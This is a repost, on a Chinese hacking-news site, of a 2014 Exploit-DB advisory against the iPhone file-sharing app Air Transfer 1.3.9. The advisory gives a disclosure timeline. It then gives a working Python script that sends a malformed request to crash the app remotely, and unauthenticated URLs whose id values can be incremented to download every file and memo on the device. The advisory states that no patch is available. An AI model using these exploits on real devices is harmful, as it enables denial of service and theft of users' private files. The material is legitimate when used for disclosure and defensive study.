记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

远程漏洞: - Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities

2014-08-24 19:35
# Exploit Title: Air Transfer Iphone v1.3.9 -Remote crash, Broken Authentication file download and Memo Access.
# Date: 08/23/2014
# Author: Samandeep Singh (SaMaN - @samanL33T )
# Vendor Homepage:http://www.darinsoft.co.kr/sub_htmls/airtransfer_guide.html
https://itunes.apple.com/us/app/air-transfer/id521595136?mt=8
# Category: WebApp
# Version: 1.3.9
# Patch/ Fix: Not available
---------------------------------------------------

Disclosure Time line
=======================
[Aug. 19 2014] Vendor Contacted
[Aug. 19 2014] Vendor replied
[Aug. 19 2014] Vendor Informed about vulnerability with POC.(No reply received)
[Aug. 21 2014] Notified vendor about Public disclosure after 24 hours (No reply received)
[Aug. 23 2014] Public Disclosure.

--------------------------------------------------------

Product & Service Details:
==========================
Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.

Features include:
-----------------

* The easiest way to transfer files between PC and iPhone/iPad !
* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !



Vulnerability details
=========================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Remote Application Crashing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/python
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host=raw_input("Enter IP : ")
port=8080
def connect():
try:
s.connect((str(host),port))
except socket.error:
print "Error: couldn't connect"
sys.exit()
return "connected to target"
#Crashing the App
def crashing():
req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
try:
s.sendall(req)
except:
print "Error occured, Couldn't crash App"
sys.exit()
return "Application Down, Conection closed"
print connect()
print crashing()
______________________________________________________________________________________________________________________________

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. Broken Authentication - Memo access & File download.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To download any file simply visit:

http://<IP>:8080/?downloadSingle?id=1

Just by incrementing the value of "id" we can download all the files.

TO view saved memos visit the below link:

http://<IP>:8080/getText?id=0


We can look for all the memos by incrementing the value of "id"



#SaMaN(@samanL33T)

























知识来源: www.exploit-db.com/exploits/34399

阅读:44553 | 评论:0 | 标签:remote

想收藏或者和大家分享这篇好文章→复制链接地址

“远程漏洞: - Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云